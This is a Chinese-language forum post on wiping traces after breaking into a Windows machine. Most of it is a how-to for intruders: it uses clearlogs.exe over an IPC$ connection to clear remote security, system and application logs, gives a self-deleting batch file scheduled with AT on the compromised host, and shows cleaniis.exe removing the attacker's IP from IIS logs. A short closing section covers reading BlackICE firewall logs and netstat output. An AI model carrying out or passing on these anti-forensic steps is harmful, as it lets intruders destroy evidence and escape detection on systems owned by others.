清理入侵后留下的痕迹~

touch_itpub

[分享]清理入侵后留下的痕迹~\n\n1.系统日志 通过手工很难清除. 这里我们介绍一个工具 clearlog.exe\n\n使用方法:\nUsage: clearlogs [computername] <-app / -sec / -sys>\n\n    -app = 应用程序日志\n    -sec = 安全日志\n    -sys = 系统日志\na. 可以清除远程计算机的日志\n** 先用ipc连接上去: net use ipipc$ 密码/user:用户名\n** 然后开始清除: 方法 \nclearlogs ip -app 这个是清除远程计算机的应用程序日志\nclearlogs ip -sec 这个是清除远程计算机的安全日志\nclearlogs ip -sys 这个是清除远程计算机的系统日志\n\nb.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面\n然后清除. 方法:\nclearlogs -app 这个是清除远程计算机的应用程序日志\nclearlogs -sec 这个是清除远程计算机的安全日志\nclearlogs -sys 这个是清除远程计算机的系统日志\n\n为了更安全一点.同样你也可以建立一个批处理文件.让自动清除. 做好批处理文件.然后用at命令建立一个计划任务. 让自动运行. 之后你就可以离开你的肉鸡了. \n建立一个 c.bat\n\nrem ============================== 开始\n@echo off\nclearlogs -app\nclearlogs -sec\nclearlogs -sys\ndel clearlogs.exe\ndel c.bat\nexit\nrem ============================== 结束\n\n在你的计算机上面测试的时候 可以不要 @echo off 可以显示出来. 你可以看到结果\n第一行表示: 运行时不显示窗口\n第二行表示: 清除应用程序日志\n第三行表示: 清除安全日志\n第四行表示: 清除系统日志\n第五行表示: 删除 clearlogs.exe 这个工具\n第六行表示: 删除 c.bat 这个批处理文件\n第七行表示: 退出\n\n用AT命令. 建立一个计划任务. \n\nAT 时间 c:c.bat\n\n之后你就可以安全离开了. 这样才更安全一点.\n\n\n2.清除iis日志:\n工具:cleaniis.exe\n使用方法:\niisantidote <logfile dir> <ip or string to hide>\niisantidote <logfile dir><ip or string to hide> stop\nstop opiton will stop iis before clearing the files and restart it after\n<logfile dir> exemple : c:winntsystem32logfilesw3svc1 dont forget the \n\n使用方法解释:\ncleaniis.exe iis日志存放的路径 清除参数\n\n例子： \ncleaniis c:winntsystem32logfilesw3svc1 192.168.0.1\n这个表示清除log中所有此IP(221.192.27.24)地址的访问记录.   -----推荐使用这种方法\n\ncleaniis c:winntsystem32logfilesw3svc1 /shop/admin/ \n这个表示清除这个目录里面的所以的日志\n\nc:winntsystem32logfilesw3svc1 代表是iis日志的位置(windows nt/2000) 这个路径可以改变\nc:windowssystem32logfilesw3svc1 代表是iis日志的位置(windows xp/2003) 这个路径可以改变\n\n同样这个也可以建立批处理. 方法同上面的那个.\n\n\n3.清除历史记录及运行的日志:\ncleaner.exe\n直接运行就可以了.\n\n4.察看blackice的日志.\n这个地方我们可以清除的看到 防火墙的日志.\n\n这个表示 有人发过来带有病毒的email附件. ip是: 220.184.153.116 \ntcp_probe_other 表示 通过tcp 扫描 或者利用别的和你建立连接 通信\n这个表示通过端口 80 扫描iis\n病毒 nimda\n这里需要很多的计算机协议知识. 同时也需要对英语有了解\n才能更好的分析 如果对英语不好 你可以装一个金山词霸. \n一般情况下 我们可以 对一些可以不用管. \n一般这三种情况 不用去管. \n最上面的 critical 这个 可以去关注一下 . 一般是确实有别的计算机扫描或者入侵你的计算机\n\ncount 代表次数   intruder 是对方的ip event 是通过什么方式(协议) 扫描或者想入侵的 \ntime表示时间\n\n5. netstat -an 可以查看自己是否是安全的~\n使用这个命令可以察看到和本机的所有的连接.\n\nProto Local Address       Foreign Address     State\n协议   本地端口及IP地址     远程端口及IP地址     状态\n\nLISTENING 监听状态 表示等待对方连接\n\nESTABLISHED 正在连接着.\n\nTCP 协议是TCP\n\nUDP 协议是UDP\n\nTCP   192.168.0.10:1115     61.186.97.54:80     ESTABLISHED\n这个表示 利用tcp协议 本机ip(192.168.0.10)通过端口:1115 和远程ip(61.186.97.54)端口:80连接\n80端口 表示 http 就是你在访问这个网站. \n\n一般情况下远程ip的端口: 80 21 8000 这个都是正常的. 如果是别的 就可以看一下你的计算机了